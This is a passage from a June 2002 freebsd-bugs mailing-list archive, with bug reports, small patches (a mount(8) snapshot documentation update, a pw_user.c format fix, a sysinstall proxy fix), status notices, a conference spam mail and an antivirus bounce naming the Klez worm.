From owner-freebsd-bugs Sun Jun 23 0:10:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9C12B37B401 for ; Sun, 23 Jun 2002 00:10:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5N7A4o66405; Sun, 23 Jun 2002 00:10:04 -0700 (PDT) (envelope-from gnats) Date: Sun, 23 Jun 2002 00:10:04 -0700 (PDT) Message-Id: <200206230710.g5N7A4o66405@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: chris@aims.com.au Subject: Re: bin/30139: snapshots mount option not documented in mount(8) Reply-To: chris@aims.com.au Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/30139; it has been noted by GNATS. From: chris@aims.com.au To: , Cc: Subject: Re: bin/30139: snapshots mount option not documented in mount(8) Date: Sun, 23 Jun 2002 17:09:25 +1000 Howdy, OK, here's an updated patch. The rest of the mount manpage suggests that line breaks after commas is not necessary. Thanks for the feedback. Sorry about the e-mail address. I must remember to regen my sendmail.cf file after upgrading. Regards, Chris Knight --- mount.8.orig Tue May 21 10:50:17 2002 +++ mount.8 Sun Jun 23 16:58:22 2002 @@ -181,6 +181,73 @@ All .Tn I/O to the filesystem should be done synchronously. +.It Cm snapshot +This option allows a snapshot of the specified filesystem to be taken. +The +.Fl u +flag is required with this option. +Note that snapshot files must be created in the filesystem that is being +snapshotted. +You may create up to 20 snapshots per filesystem. +Active snapshots are recorded in the superblock, so they persist across unmount +and remount operations and across system reboots. +When you are done with a snapshot, it can be removed with the +.Xr rm +command. +Snapshots may be removed in any order, however you may not get back all the +space contained in the snapshot as another snapshot may claim some of the blocks +that it is releasing. +Note that the schg flag is set on snapshots to ensure that not even the root +user can write to them. +The unlink command makes an exception for snapshot files in that it allows them +to be removed even though they have the schg flag set, so it is not necessary to +clear the schg flag before removing a snapshot file. +.Pp +Once you have taken a snapshot, there are three interesting things that you can +do with it: +.Pp +.Bl -enum -compact +.It +Run fsck on the snapshot file. +Assuming that the filesystem was clean when it was mounted, you should always +get a clean (and unchanging) result from running fsck on the snapshot. +This is essentially what the background fsck process does. +.Pp +.It +Run dump on the snapshot. +You will get a dump that is consistent with the filesystem as of the timestamp +of the snapshot. +Note that +.Xr dump +has not yet been changed to set the dumpdates file correctly, so do not use this +feature in production until that fix is made. +.Pp +.It +Mount the snapshot as a frozen image of the filesystem. +To mount the snapshot +.Pa /var/snapshot/snap1 : +.Bd -literal +mdconfig -a -t vnode -f /var/snapshot/snap1 -u 4 +mount -r /dev/md4 /mnt +.Ed +.Pp +You can now cruise around your frozen +.Pa /var +filesystem at +.Pa /mnt . +Everything will be in the same state that it was at the time the snapshot was +taken. +The one exception is that any earlier snapshots will appear as zero length +files. +When you are done with the mounted snapshot: +.Bd -literal +umount /mnt +mdconfig -d -u 4 +.Ed +.Pp +Further details can be found in the file at +.Pa /usr/src/sys/ufs/ffs/README.snapshot . +.El .It Cm suiddir A directory on the mounted filesystem will respond to the SUID bit being set, by setting the owner of any new files to be the same To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 9:20:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AD7ED37B401 for ; Sun, 23 Jun 2002 09:20:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NGK3069240; Sun, 23 Jun 2002 09:20:03 -0700 (PDT) (envelope-from gnats) Date: Sun, 23 Jun 2002 09:20:03 -0700 (PDT) Message-Id: <200206231620.g5NGK3069240@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Marc Olzheim Subject: Re: bin/17619: pax cannot read all tar files created by tar. Reply-To: Marc Olzheim Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/17619; it has been noted by GNATS. From: Marc Olzheim To: Anatoly Vorobey Cc: Marc Olzheim , freebsd-gnats-submit@freebsd.org Subject: Re: bin/17619: pax cannot read all tar files created by tar. Date: Sun, 23 Jun 2002 18:09:21 +0200 > See the attached patch. Tested, works fine. Maybe someone shall > review/commit it? Hmmm, the patch has worked fine for met for quite some time now. Is anyone still maintaining pax ? OpenBSD has fixed it in a different way, somehow by the way... Zlo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 10:43:52 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A719837B400; Sun, 23 Jun 2002 10:43:48 -0700 (PDT) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NHhmp82129; Sun, 23 Jun 2002 10:43:48 -0700 (PDT) (envelope-from iedowse) Date: Sun, 23 Jun 2002 10:43:48 -0700 (PDT) From: Message-Id: <200206231743.g5NHhmp82129@freefall.freebsd.org> To: alexai709@msn.com, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/39571: free NULL mbuf in function icmp_errer() Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: free NULL mbuf in function icmp_errer() State-Changed-From-To: feedback->closed State-Changed-By: iedowse State-Changed-When: Sun Jun 23 10:38:01 PDT 2002 State-Changed-Why: Submitter confirmed that the reported bug does not exist; the real problem was a bug in local kernel modifications. http://www.freebsd.org/cgi/query-pr.cgi?pr=39571 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 12: 0:25 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8C37E37B406 for ; Sun, 23 Jun 2002 12:00:11 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NJ0Bi95787; Sun, 23 Jun 2002 12:00:11 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id AA9F737B407 for ; Sun, 23 Jun 2002 11:57:58 -0700 (PDT) Received: from xkulesh.vol.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5NIvsTt018355 for ; Sun, 23 Jun 2002 20:57:54 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from dan@localhost) by xkulesh.vol.cz (8.12.3/8.12.4/Submit) id g5NIpD5a012662; Sun, 23 Jun 2002 20:51:13 +0200 (CEST) Message-Id: <200206231851.g5NIpD5a012662@xkulesh.vol.cz> Date: Sun, 23 Jun 2002 20:51:13 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39741: usr.sbin/pw/pw_user.c:726: warning: int format, long int arg (arg 8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39741 >Category: bin >Synopsis: usr.sbin/pw/pw_user.c:726: warning: int format, long int arg (arg 8) >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 23 12:00:10 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: 4.6-STABLE FreeBSD src/usr.sbin/pw/pw_user.c,v 1.34.2.11 2002/03/12 19:55:36 >Description: compile of src/usr.sbin/pw/pw_user.c,v 1.34.2.11 2002/03/12 19:55:36: usr.sbin/pw/pw_user.c:726: warning: int format, long int arg (arg 8) >How-To-Repeat: N/A >Fix: --- pw_user.c.ORIG Tue Mar 12 23:07:08 2002 +++ pw_user.c Sun Jun 23 20:42:51 2002 @@ -720,7 +720,7 @@ errx(EX_NOUSER, "user '%s' disappeared during update", a_name->val); grp = GETGRGID(pwd->pw_gid); - pw_log(cnf, mode, W_USER, "%s(%ld):%s(%d):%s:%s:%s", + pw_log(cnf, mode, W_USER, "%s(%ld):%s(%ld):%s:%s:%s", pwd->pw_name, (long) pwd->pw_uid, grp ? grp->gr_name : "unknown", (long) (grp ? grp->gr_gid : -1), pwd->pw_gecos, pwd->pw_dir, pwd->pw_shell); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 12: 6:10 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mta7.pltn13.pbi.net (mta7.pltn13.pbi.net [64.164.98.8]) by hub.freebsd.org (Postfix) with ESMTP id 3D70837B411; Sun, 23 Jun 2002 12:05:51 -0700 (PDT) Received: from 3gwireless.com ([66.122.212.148]) by mta7.pltn13.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GY600061A9QOG@mta7.pltn13.pbi.net>; Sun, 23 Jun 2002 12:05:38 -0700 (PDT) Date: Sun, 23 Jun 2002 12:09:31 -0700 From: 3Gwireless'2003 Subject: Call for Submission of 2003 World Wireless Congress (3Gwireless'2003) Message-id: <3D161CEA.EB3E6CE7@3gwireless.com> MIME-version: 1.0 X-Mailer: Mozilla 4.78 [en] (Win98; U) Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT X-Accept-Language: en X-Priority: 2 (High) To: undisclosed-recipients:; Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [Sorry for multiple copies of this message. Thanks for your support in promotion of education, research, development and business of emerging wireless communications] Dear Fellow Wireless Colleagues: 2002 World Wireless Congress (WWC02) - the official framework of 3Gwireless'2002 has been extremely successful and productive. To continue this great effort and expect much more authoritative in the next year, the 2003 World Wireless Congress (WWC03) will be a very big bang in helping set the standard of performance, innovation and quality of emerging wireless communications focusing on 3G and 4G mobile technologies and business. WWC'03 will continue to be the best global platform of industry-driven, academia-enriched, development-oriented and business-targeted, and demand very high standard of technical leadership as well as professional excellence. The Call-for-Submission (including technical papers, tutorials, industry forums, panels, etc) is available now at the congress website. The submission will be very busy in the coming months, and the space is very limited. Please act ASAP to submit your leadership and innovation as per the guidelines listed in the web. The website of 2003 World Wireless Congress (3Gwireless'2003) is at: http://wirelesscongress.com or http://3gwireless.com The very successful story of 2002 World Wireless Congress (3Gwireless'2002) is at: http://delson.org/wwc02 This congress at news can be found at: http://www.wirelessweek.com/index.asp?layout=story&articleId=CA220172&stt=001 For sponsorship or exhibition opportunities, please contact janny@delson.org. For technical leadership issues, please contact the chair at: wwlu@ieee.org Thank you for your time in advance. With best wishes! Office of 2003 World Wireless Congress http://wirelesscongress.com or http://3gwireless.com [This is only one-time educational message. Thanks for your support.] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 13: 3:57 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0120B37B40C; Sun, 23 Jun 2002 13:03:39 -0700 (PDT) Received: (from anders@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NK3cP06190; Sun, 23 Jun 2002 13:03:38 -0700 (PDT) (envelope-from anders) Date: Sun, 23 Jun 2002 13:03:38 -0700 (PDT) From: Message-Id: <200206232003.g5NK3cP06190@freefall.freebsd.org> To: anders@fix.no, anders@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/36894: Generate SSH2 RSA host key Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Generate SSH2 RSA host key State-Changed-From-To: open->closed State-Changed-By: anders State-Changed-When: Sun Jun 23 13:03:20 PDT 2002 State-Changed-Why: This isn't a problem anymore. http://www.freebsd.org/cgi/query-pr.cgi?pr=36894 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 13:47:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7622E37B41E; Sun, 23 Jun 2002 13:47:16 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NKlGV17584; Sun, 23 Jun 2002 13:47:16 -0700 (PDT) (envelope-from robert) Date: Sun, 23 Jun 2002 13:47:16 -0700 (PDT) From: Message-Id: <200206232047.g5NKlGV17584@freefall.freebsd.org> To: kahmy@uclink.berkeley.edu, robert@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/39377: freopen() in libc_r does not append Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: freopen() in libc_r does not append State-Changed-From-To: open->patched State-Changed-By: robert State-Changed-When: Sun Jun 23 13:44:38 PDT 2002 State-Changed-Why: A fix has been commited to -current. Thank's for reporting the bug! http://www.freebsd.org/cgi/query-pr.cgi?pr=39377 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 14:46:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 55AD337B40B; Sun, 23 Jun 2002 14:46:09 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NLk9E30101; Sun, 23 Jun 2002 14:46:09 -0700 (PDT) (envelope-from des) Date: Sun, 23 Jun 2002 14:46:09 -0700 (PDT) From: Message-Id: <200206232146.g5NLk9E30101@freefall.freebsd.org> To: des@FreeBSD.org, des@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/39206: core dump bug in sshd Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: core dump bug in sshd Responsible-Changed-From-To: des->freebsd-bugs Responsible-Changed-By: des Responsible-Changed-When: Sun Jun 23 14:45:50 PDT 2002 Responsible-Changed-Why: I am no longer interested in maintaining OpenSSH. http://www.freebsd.org/cgi/query-pr.cgi?pr=39206 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 14:57:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4F8B337B409; Sun, 23 Jun 2002 14:56:52 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NLums31546; Sun, 23 Jun 2002 14:56:48 -0700 (PDT) (envelope-from robert) Date: Sun, 23 Jun 2002 14:56:48 -0700 (PDT) From: Message-Id: <200206232156.g5NLums31546@freefall.freebsd.org> To: peter@stairways.com.au, robert@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/39617: traceroute fd_set allocation bug Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: traceroute fd_set allocation bug State-Changed-From-To: open->patched State-Changed-By: robert State-Changed-When: Sun Jun 23 14:55:58 PDT 2002 State-Changed-Why: A fix has been commited to -current. Thank you for submitting the bug report! http://www.freebsd.org/cgi/query-pr.cgi?pr=39617 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 15:50: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D4E2F37B400 for ; Sun, 23 Jun 2002 15:50:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5NMo3F42414; Sun, 23 Jun 2002 15:50:03 -0700 (PDT) (envelope-from gnats) Date: Sun, 23 Jun 2002 15:50:03 -0700 (PDT) Message-Id: <200206232250.g5NMo3F42414@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "John Fitzgibbon" Subject: Re: bin/36383: sed misbehaves with 2044 char substitute patterns Reply-To: "John Fitzgibbon" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/36383; it has been noted by GNATS. From: "John Fitzgibbon" To: "Tim Robbins" , Cc: Subject: Re: bin/36383: sed misbehaves with 2044 char substitute patterns Date: Sun, 23 Jun 2002 15:40:07 -0700 I cvsup'd to 4.6 and the problem seems to be fixed. The content of "test.dat" does not affect the outcome. John Fitzgibbon. ----- Original Message ----- From: "Tim Robbins" To: Cc: "John Fitzgibbon" Sent: Friday, June 21, 2002 7:14 PM Subject: Re: bin/36383: sed misbehaves with 2044 char substitute patterns Does this problem still exist? I cannot reproduce it 4.6 or -CURRENT. What is in test.dat? Is there an over-long line in it, a missing newline at EOF, or something special? Tim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 19:50:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E573F37B403 for ; Sun, 23 Jun 2002 19:50:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O2o1s82618; Sun, 23 Jun 2002 19:50:01 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 6C6D837B400 for ; Sun, 23 Jun 2002 19:40:44 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5O2eihG045907 for ; Sun, 23 Jun 2002 19:40:44 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5O2ei3Z045906; Sun, 23 Jun 2002 19:40:44 -0700 (PDT) Message-Id: <200206240240.g5O2ei3Z045906@www.freebsd.org> Date: Sun, 23 Jun 2002 19:40:44 -0700 (PDT) From: WATANABE Yuichi To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39754: sysinstall HTTP_proxy bug Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39754 >Category: misc >Synopsis: sysinstall HTTP_proxy bug >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 23 19:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: WATANABE Yuichi >Release: FreeBSD 4.6R >Organization: ASCII Corp. >Environment: FreeBSD oapc13.oa.ascii.co.jp 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Wed Jun 19 14:35:17 JST 2002 root@oapc13.oa.ascii.co.jp:/usr/src/sys/compile/PRTSVR00 i386 >Description: /stand/sysinstall core dump when specified HTTP-proxy in order to install packages. this problem appeaed at FreeBSD 4.5R, 4.6R. there is no problem before FreeBSD 4.4R. >How-To-Repeat: See http://www.freebsd.org/cgi/query-pr.cgi?pr=i386/34684 >Fix: 1) modify /usr/src/release/sysinstall/http.c HEAD --> GET 2) make 3) make install -------------------------------------- *** http.org Mon Jun 24 11:28:41 2002 --- http.c Mon Jun 24 11:25:02 2002 *************** *** 219,225 **** --- 219,228 ---- return NULL; } + /* sprintf(req,"HEAD %s/%s%s HTTP/1.0\r\n\r\n", + */ + sprintf(req,"GET %s/%s%s HTTP/1.0\r\n\r\n", variable_get(VAR_HTTP_PATH), file, variable_get(VAR_HTTP_FTP_MODE)); if (isDebug()) { --------------------------------------------- >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 20:49: 2 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6482B37B400; Sun, 23 Jun 2002 20:49:00 -0700 (PDT) Received: (from matusita@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O3n0f92444; Sun, 23 Jun 2002 20:49:00 -0700 (PDT) (envelope-from matusita) Date: Sun, 23 Jun 2002 20:49:00 -0700 (PDT) From: Message-Id: <200206240349.g5O3n0f92444@freefall.freebsd.org> To: yuu-w@ascii.co.jp, matusita@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/39754: sysinstall HTTP_proxy bug Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sysinstall HTTP_proxy bug State-Changed-From-To: open->closed State-Changed-By: matusita State-Changed-When: Sun Jun 23 20:47:34 PDT 2002 State-Changed-Why: Fixed, thank you. And sorry that this was introduced by my mis-MFCed code. http://www.freebsd.org/cgi/query-pr.cgi?pr=39754 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jun 23 23:38: 2 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from ns.netorn.ru (ls-host14.interlan.ru [213.247.143.46]) by hub.freebsd.org (Postfix) with ESMTP id E831337B401 for ; Sun, 23 Jun 2002 23:37:03 -0700 (PDT) Received: (from root@localhost) by ns.netorn.ru (8.11.6/8.11.6) id g5O6fPg03084 for ; Mon, 24 Jun 2002 10:41:25 +0400 (MSD) (envelope-from DrWeb-DAEMON@netorn.ru) Date: Mon, 24 Jun 2002 10:41:25 +0400 (MSD) From: DrWeb-DAEMON@netorn.ru Message-Id: <200206240641.g5O6fPg03084@ns.netorn.ru> X-drweb-hash: 178b710f5bd3c6c128b7a0bc189f06a0 Subject: Недоставленное сообщение: By VisEditor from 4Q Software Content-Type: text/plain; charset=koi8-r To: undisclosed-recipients: ; Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Уважаемый Получатель, Сообщение, посланное Вам инфицировано и не было доставлено. Отчет антивирусного фильтра: --- DrWeb report --- ====================== DrWeb scanning report: ====================== 127.0.0.1 [3082] /var/drweb/spool/drweb.tmp_stoYIw - archive MAIL 127.0.0.1 [3082] >/var/drweb/spool/drweb.tmp_stoYIw/html.1 - Ok 127.0.0.1 [3082] >/var/drweb/spool/drweb.tmp_stoYIw/by infected with Win32.HLLM.Klez.4 127.0.0.1 [3082] >/var/drweb/spool/drweb.tmp_stoYIw/3-1.jpg - Ok ======== Summary: ======== known virus is found : 1 unknown code or multiple errors : 1 --- DrWeb report --- Сообщение сохранено в карантине под именем: drweb.infected_7wSY2z Что бы получить это сообщение обратитесь к администратору по адресу postmaster, указав имя, под которым сохранено сообщение для Вас. --- Антивирусная защита DrWeb Daemon (http://www.drweb.ru) Присылайте Ваши пожелания в DialogueScience, Inc. (http://www.dials.ru, support@dials.ru) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 1:37:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AF06537B4B2 for ; Mon, 24 Jun 2002 00:20:08 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O7A1S33750; Mon, 24 Jun 2002 00:10:01 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 461DC37B400 for ; Mon, 24 Jun 2002 00:03:48 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5O73ihG070406 for ; Mon, 24 Jun 2002 00:03:44 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5O73ilW070405; Mon, 24 Jun 2002 00:03:44 -0700 (PDT) Message-Id: <200206240703.g5O73ilW070405@www.freebsd.org> Date: Mon, 24 Jun 2002 00:03:44 -0700 (PDT) From: Hideyuki KURASHINA To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: conf/39763: Can't get a correct MAC address for MELCO LPC3-TX Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39763 >Category: conf >Synopsis: Can't get a correct MAC address for MELCO LPC3-TX >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: wish >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 00:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Hideyuki KURASHINA >Release: FreeBSD 5.0-CURRENT >Organization: Nagaoka National College of Technology >Environment: ed.rushani.jp 5.0-CURRENT-20020616-JPSNAP FreeBSD 5.0-CURRENT-20020616-JPSNAP #0: Fri Jun 21 16:39:17 GMT 2002 root@ed.rushani.jp:/usr/obj/usr/src/sys/ED i386 >Description: According to the commit log in revision 1.166 of src/etc/defaults/pccard.conf, fix MELCO LPC3-TX config use ``config auto'' add ether line but `ether line' was added in BUFFALO LPC3-CLX, not in BUFFALO LPC3-TX. This line should be added in MELCO LPC3-TX config. In current status (both -current and -stable), you will get an incorrect MAC address When LPC3-TX is inserted like follows: ed1: address 01:02:00:ff:xx:xx, type NE2000 (16bit) If add 'ether 0x1c8' line into the relevant position, you will get a correct MAC address like follows: ed1: address 00:40:26:xx:xx:xx, type NE2000 (16bit) P.S. I also reported this problem at [bsd-nomads:16359] http://www.clave.gr.jp/ml/bsd-nomads/200206/msg00034.html (in Japanese) >How-To-Repeat: insert MELCO LPC3-TX into your laptop. >Fix: put ether 0x1c8 line into configuration of BUFFALO LPC3-TX. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 1:40:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0BD5B37B4B3 for ; Mon, 24 Jun 2002 00:20:10 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5O7A1933739; Mon, 24 Jun 2002 00:10:01 -0700 (PDT) (envelope-from gnats) Received: from postoffice.aims.com.au (eth0.lnk.aims.com.au [203.31.73.253]) by hub.freebsd.org (Postfix) with ESMTP id 855C437B400 for ; Mon, 24 Jun 2002 00:01:20 -0700 (PDT) Received: from ait0td02.aims.private (ait0td02.aims.private [192.168.10.253]) by postoffice.aims.com.au with ESMTP id g5O71Jm40100; Mon, 24 Jun 2002 17:01:19 +1000 (EST) (envelope-from chris@aims.com.au) Received: from ait0td02.aims.private (localhost [127.0.0.1]) by ait0td02.aims.private (8.12.4/8.12.4) with ESMTP id g5O71HDN007750; Mon, 24 Jun 2002 17:01:17 +1000 (EST) (envelope-from chris@aims.com.au) Received: (from root@localhost) by ait0td02.aims.private (8.12.4/8.12.4/Submit) id g5O71H2O007749; Mon, 24 Jun 2002 17:01:17 +1000 (EST) Message-Id: 